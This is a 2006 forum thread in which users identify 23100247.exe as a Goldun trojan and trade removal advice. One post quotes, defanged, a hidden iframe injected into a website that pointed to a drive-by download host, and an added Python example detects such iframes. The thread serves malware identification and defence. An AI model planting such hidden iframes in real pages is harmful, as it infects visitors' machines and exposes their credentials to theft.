Old 09-July-06, 11:33 AM   #1 (permalink)
Apex Tech Demi-God
TheGreatSatan's Avatar
Default What the hell is 23100247.exe?

My Sygate firewall advised me that 23100247 is trying to broadcast. Not knowing what it is I blocked it.



I found it in the C drive, but it doesn't say what it belongs to.



I ran Spybot and Adaware and they didn't touch it. Anyone know what it is?
TheGreatSatan is offline     Reply With Quote
Old 09-July-06, 11:39 AM   #2 (permalink)
Custom What?
Lokie's Avatar
Default Re: What the hell is 23100247.exe?

Hmm, it seems to be part of a malware; 23100247.exe shows as part of Goldun.Fam. Have your utilities removed this recently?

Found a better description on CounterSpy... here.
Lokie is online now     Reply With Quote
Old 09-July-06, 03:09 PM   #3 (permalink)
Apex Tech Maniac Supreme
PurpleDiamond's Avatar
Default Re: What the hell is 23100247.exe?

An executable running from the root? (C:\) - I smell something fishy.
PurpleDiamond is offline     Reply With Quote
Old 09-July-06, 03:36 PM   #4 (permalink)
Linux Warrior
FunkyStickman's Avatar
Default Re: What the hell is 23100247.exe?

Sounds more like a virus, which is probably why Ad-Aware etc. didn't catch it. They're very specific.
FunkyStickman is offline     Reply With Quote
Old 09-July-06, 04:01 PM   #5 (permalink)
Custom What?
Lokie's Avatar
Default Re: What the hell is 23100247.exe?

Goldun.Fam

Type: Malware
Type Description: Malware ("malicious software") consists of software with clearly malicious, hostile, or harmful functionality or behavior and that is used to compromise and endanger individual PCs as well as entire networks.
Category: Trojan
Category Description: Trojan is a general term for malicious software that is installed under false or deceptive pretenses or is installed without the user's full knowledge and consent. Most Trojans exhibit some form of malicious, hostile, or harmful functionality or behavior.
Level: Severe
Level Description: Severe risk threats are typically installed without user interaction through security exploits, and may allow an attacker to remotely control the infected machine. Such threats may allow the attacker to install additional malware and use the compromised machine to participate in denial of service attacks, spamming, and bot nets, or to transmit sensitive data to a remote server. The malware may be cloaked and not visible to the user. These threats severely compromise the system by lowering security settings, installing “backdoors,” infecting system files, or spreading to other networked machines.
Advice Type: Remove
Description: Goldun.Fam is a family of Trojan horse programs that steals users' information entered for authentication on e-gold online web forms.
Add. Description: Goldun trojans may be packaged with the Savage.b MyDoom spambot installer, the SSA-Keylogger installer and/or Haxdoor. Goldun trojans sometimes use rootkit (cloaking) technology as well. Some variants are known to block access to antivirus sites.
Alias: McAfee: PWS-Banker.ar; Kaspersky: Trojan-Spy.Win32.Goldun.ei; TrendMicro: TSPY_GOLDUN.AS; F-Secure: W32/Goldun.BY@pws; Bitdefender: Trojan.Spy.Goldun.EI
File Traces
This is the culprit-->23100247.exe
Lokie is online now     Reply With Quote
Old 09-July-06, 06:45 PM   #6 (permalink)
Apex Tech Demi-God
TheGreatSatan's Avatar
Default Re: What the hell is 23100247.exe?

You think click and delete will be enough? Because AVG didn't find it.
TheGreatSatan is offline     Reply With Quote
Old 09-July-06, 06:50 PM   #7 (permalink)
I Drive A Mac
post_break's Avatar
Default Re: What the hell is 23100247.exe?

I would delete it while Windows isn't running; that's the only way to be sure it isn't cached so it won't reproduce.
post_break is offline     Reply With Quote
Old 09-July-06, 07:09 PM   #8 (permalink)
PCApex Newscaster
THRASHER2's Avatar
Talking Re: What the hell is 23100247.exe?

I always delete spyware in Safe Mode (when it is not running).
THRASHER2 is offline     Reply With Quote
Old 09-July-06, 07:29 PM   #9 (permalink)
Custom What?
Lokie's Avatar
Default Re: What the hell is 23100247.exe?

And disconnect the network cable just in case.
Lokie is online now     Reply With Quote
Old 10-July-06, 05:00 AM   #10 (permalink)
Apex Techie Lite
Default Re: What the hell is 23100247.exe?

Well, it could be that program used to communicate with North Korean Spy Satellites...
fairlane_68 is offline     Reply With Quote
Old 12-July-06, 10:55 AM   #11 (permalink)
Apex Techie Wannabe
Default Re: What the hell is 23100247.exe?

Hi, to everybody,
At last I found someone like me facing this problem (for the last 4 days even your post was not visible on Google). Read my story...

Recently I noticed '23100247.exe' (2173 bytes) lying on my computer in c:\ (root directory).
I searched on Google but was unable to find much info about this file.
Then I tried to find more info on my computer and found that the file was installed by a website (this website is for business and for freelancers and aff. marketing, has good partners; I cannot disclose its name because I am not sure, but I found the following).
I have removed the <> HTML marks so that it should not be embedded in the forum page;
http is replaced by hxxp.
DO NOT VISIT THE FOLLOWING SITE UNLESS YOU ARE A SECURITY EXPERT AND KNOW WHAT YOU ARE DOING
1) The main HTML file has some JavaScript function opening to
div style="visibility:hidden"> iframe src="hxxp://dnv-counter.com/dnv3/" width=1 height=1 /iframe /div

2) If you visit the above URL (be careful), you may get the above file (I have not tried this, but I think it is hosted by the above URL); you can even find start.exe in the temporary internet folder, and both files appear to be the same. That means the above URL's code copied start.exe to the root under the name 23100247.exe.
3) I think some code is downloaded and does all the above stuff.
4) I don't know if it is a secret counter to trace visitors or malware (or the website I have visited may be infected by malware).
5) If this is a secret counter then this is incorrect; they have to show a notice before making a copy to my system.
6) I scanned with Norton AntiVirus (with the latest update, a full system scan and that file also) but it says no infection found.
I downloaded the trial version of Spyware Doctor from download.com. It only shows alex bho option entries in the registry and the alert level is low; no reference to the above file.

I searched for dnv-counter.com on Google but was unable to find any info.

In a Google search, on one forum I found:
A)
"The site called us-counter.com and dnv-counter.com belong to a guy from Ukraine and are blacklisted with several records. IP´s from the sites and from the hosting company are pretty much the same."
B) Found some reference in a forum regarding us-counter.com/trf1 (before, maybe doing the same thing).

But I am unable to understand it...
6) OK, now my query is:
a) What is going on (I have deleted 23100247.exe)
b) What it did to my system
c) How do I come to know what they have stolen (or downloaded from my system)
d) Can I rely on my antivirus / Spyware Doctor clean report

Plz help ASAP.
Thanks in advance

Last edited by ap3000; 12-July-06 at 11:02 AM..
ap3000 is offline     Reply With Quote
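
The pattern ap3000 describes in post #11 (an iframe of width 1 and height 1, wrapped in a div with visibility:hidden and pointing at another host) can be checked for in saved page source. The Python below is an added example, not part of any post in this thread; the function names, the sample HTML and the `.example` hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

VOID = {"img", "br", "hr", "input", "meta", "link", "area", "base", "col", "wbr"}

def _hides(style):
    # True when an inline style makes the element invisible
    s = (style or "").replace(" ", "").lower()
    return "visibility:hidden" in s or "display:none" in s

def _tiny(value):
    # A width/height of 0 or 1 pixel makes the frame effectively invisible
    return re.fullmatch(r"\s*0*[01](px)?\s*", value or "", re.I) is not None

class HiddenIframeFinder(HTMLParser):
    """Collect iframes that load another host while being invisible."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.stack = []      # (tag, hides) for every element still open
        self.findings = []   # (src, [reasons])

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hides = _hides(a.get("style"))
        if tag == "iframe":
            reasons = []
            if hides or any(h for _, h in self.stack):
                reasons.append("hidden-by-css")
            if _tiny(a.get("width")) and _tiny(a.get("height")):
                reasons.append("tiny-dimensions")
            host = (urlparse(a.get("src") or "").hostname or "").lower()
            # Exact host comparison; sibling subdomains count as third-party
            if reasons and host and host != self.page_host:
                self.findings.append((a["src"], reasons))
        if tag not in VOID:
            self.stack.append((tag, hides))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag, tolerating unclosed elements
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings

# Constructed sample page: only the last iframe is hidden AND third-party.
SAMPLE = """<html><body><p>Welcome</p>
<iframe src="http://www.shop.example/banner.html" width="1" height="1"></iframe>
<iframe src="http://video.example/embed/42" width="560" height="315"></iframe>
<div style="visibility:hidden"><iframe src="http://counter.example/c/" width=1 height=1></iframe></div>
</body></html>"""
```

Only inline styles and width/height attributes are inspected, so frames hidden through an external stylesheet or injected by script at load time need a rendered-DOM check instead.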
Old 15-July-06, 11:40 AM   #12 (permalink)
Custom What?
Lokie's Avatar
Default Re: What the hell is 23100247.exe?

Quote:
Originally Posted by ap3000
But unable understand it ..
6) ok now my query is
a) what is going on ( I have deleted 23100247.exe) : Check your firewall for the items with approved traffic; if you don't know the application running, block it.
b) what It did to my system : With stray lines of code in everyone's system Lord knows what it is affecting.
c) how I come to know what they have stolen ( or downloaded from my system) : Not too sure on that, could have been everything or nothing?
d) Can I rely on my anti virus / spyware doctor clean report : The best you can do is update regularly and hope for the best. New codes are created every day and just using a PC is a risk anymore.

plz help assp.
Thanks in advance

First Off, Welcome to PCApex.

Your English is a bit off but I think I get what you are asking.
Lokie is online now     Reply With Quote